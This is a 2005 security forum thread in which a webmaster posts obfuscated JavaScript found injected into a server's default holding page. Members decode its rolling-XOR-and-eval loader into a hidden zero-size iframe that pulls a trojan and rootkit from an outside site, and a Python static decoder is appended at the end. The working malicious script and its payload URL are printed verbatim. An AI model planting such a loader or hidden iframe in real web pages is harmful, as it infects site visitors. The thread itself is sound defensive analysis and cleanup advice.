-
December 24th, 2005, 12:47 AM
#1
Junior Member
Virus code on a webpage?
I found this code lurking on one of my webpages that was mysteriously uploaded
It downloads a trojan apparently each time a person visited a page on my site
does anyone know what this code is and what it's translated to???
<script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</script></body>
-
December 24th, 2005, 01:26 AM
#2
It looks vaguely like the SCOB javascript trojan or some sort of variant?
-
December 24th, 2005, 01:38 AM
#3
I found this code lurking on one of my webpages that was mysteriously uploaded
Nihil. I tried giving you (+) points but
You have given out too many AntiPoints today, try again later.
So when I have the chance I will.
Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.
http://toolbar.netcraft.com/site_rep...rosecurity.com
-
December 24th, 2005, 02:29 AM
#4
Junior Member
Originally posted here by Computernerd22
Nihil. I tried giving you (+) points but
So when I have the chance I will.
Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.
http://toolbar.netcraft.com/site_rep...rosecurity.com
hey!
Actually nah, it's not on the siteprosecurity site, don't have that no more; first time I've posted here in 2 yrs.
It was actually on my webserver under the cPanel skeleton directory.
I registered a domain name for a client today and have this default holding page for all new clients, and that code appeared somehow on the default holding page!
I'm running Apache/Linux on my server!
cheers!
-
December 24th, 2005, 02:37 AM
#5
It translates to:
PHP Code:
<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>
That site then tries to load /xxx.ani, which in turn will go for: (sanitized URL)
htXtp://www.bestswf.com/web.exe
web.exe will use some code known as EliRT 1.01, which looks like rootkit stuff.
Virustotal doesn't like web.exe
Have fun nihil!
edit...
by the way siteprosecurity , that means you've been owned
-
December 24th, 2005, 03:00 AM
#6
Junior Member
hmm thanks for that
ok owned i guess means that some person has had access to the root of the server?
everything else seems to be intact and all, although last weekend I do remember the server suffering badly and all, but it's been ok since then?
anyone got tips to move on from here?
i have rkhunter installed did not pick up anything
-
December 24th, 2005, 04:05 AM
#7
-
December 25th, 2005, 12:10 AM
#8
Originally posted here by siteprosecurity
hmm thanks for that
ok owned i guess means that some person has had access to the root of the server?
You probably have some hidden files located on the server. I've found them hidden in the recycle bins in the past, and in some of the OS system folders. I'd use the Sysinternals Rootkit Revealer and do some safemode hunting. 'course, first thing is to change all the local admin passwords, domain passwords and check for odd new local accounts.
[Edit]
Or, if you take nihil's suggestion, just unplug from the net, isolate and wait for the forensics team.
[/Edit]
-
December 27th, 2005, 01:30 PM
#9
To find out how Soda_Popinsky got the <iframe> tag...
(I'm going to assume windows to find out what it does)
The piece of script is JavaScript.. Copy 'n' paste the code into Notepad and save as test.js
Then edit it a bit to make it more readable...
Code:
x=94;                               // initial XOR key; it is incremented once per character
es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";
var ds=new String();                // decoded output is accumulated here
ads=es.split(";");                  // one encoded byte per element (last element is empty)
k=ads.length-1;                     // skip the trailing empty element
for(var j=0;j<k;j++){
e=ads[j];
gg="d=e";
gg=gg+"^x";
eval(gg);                           // builds and runs "d=e^x", i.e. d = e XOR x
x+=1;                               // next character uses the next key value
ds=ds+String.fromCharCode(d);       // append the decoded character
}
WScript.Echo(ds)                    // was eval(ds) in the original: print instead of executing
Change that last eval statement into a WScript.Echo (bold in the code) and run it with cscript..
What it basically does is it splits the string es into its separate pieces.. For the first one e becomes 58. gg will contain d=e^x, x=94 at first. After the eval statement d=100 (d=58 XOR 94). You can change the whole gg=.... eval(gg) into d=e^x. Next it adds 1 to x for the next round. Then it converts the decimal 100 into its ASCII character (d) and adds it to ds. The last statement (eval; which I changed to WScript.Echo) executes the string ds (which at the end contains 'document.write('<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>');').
anyone got tips to move on from here?
Yep.. Backup all the important stuff and reinstall the server from scratch using the original installation CD's. Don't forget to patch it afterwards (and plug the hole they used to get in)..
Oliver's Law:
Experience is something you don't get until just after you need it.
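The same rolling-XOR decode as post #9 describes, done statically in Python so nothing from the page is ever executed. This is an added example, not from the thread; the script text is a constructed copy of the snippet in post #1, and the regexes assume that obfuscator's layout (x=NN and es="..."):

```python
import re

# Constructed copy of the <script> block from post #1 (same key and byte list).
SAMPLE_SCRIPT = (
    '<script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;'
    '85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;'
    '163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;'
    '201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;'
    '208;136;144;145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;'
    'for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;'
    'ds=ds+String.fromCharCode(d);}eval(ds)</script>'
)


def extract_params(script):
    """Pull the starting key (x=NN) and the ';'-separated byte list (es="...") out of the script.

    Assumes the layout seen in post #1; raises if either piece is missing.
    """
    key = re.search(r'\bx=(\d+);', script)
    enc = re.search(r'\bes="([\d;]*)"', script)
    if not key or not enc:
        raise ValueError("script does not match the expected obfuscator layout")
    values = [int(v) for v in enc.group(1).split(';') if v]  # drop trailing empty element
    return int(key.group(1)), values


def decode_rolling_xor(values, key):
    """Replay the loop without eval: character i is values[i] XOR (key + i)."""
    return ''.join(chr(v ^ (key + i)) for i, v in enumerate(values))


def decode_script(script):
    """Return the string the malware would have passed to eval(ds)."""
    key, values = extract_params(script)
    return decode_rolling_xor(values, key)


def iframe_sources(html):
    """List the src attributes of any <iframe> tags in the decoded payload (for blocking/IOC notes)."""
    return re.findall(r'<iframe[^>]*\bsrc="([^"]+)"', html, flags=re.I)


if __name__ == "__main__":
    decoded = decode_script(SAMPLE_SCRIPT)
    print(decoded)
    print("iframe targets:", iframe_sources(decoded))
```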
-
December 27th, 2005, 07:15 PM
#10
well I gotta ask. Couldn't this (and most likely) be a XSS attack? I don't know if they compromised root... On your web page(s), do you use any .php or .asp or anything similarly dynamic? Are you sure it was an 'uploaded' page and not XSS?
The fool doth think he is wise, but the wise man knows himself to be a fool - Good Ole Bill Shakespeare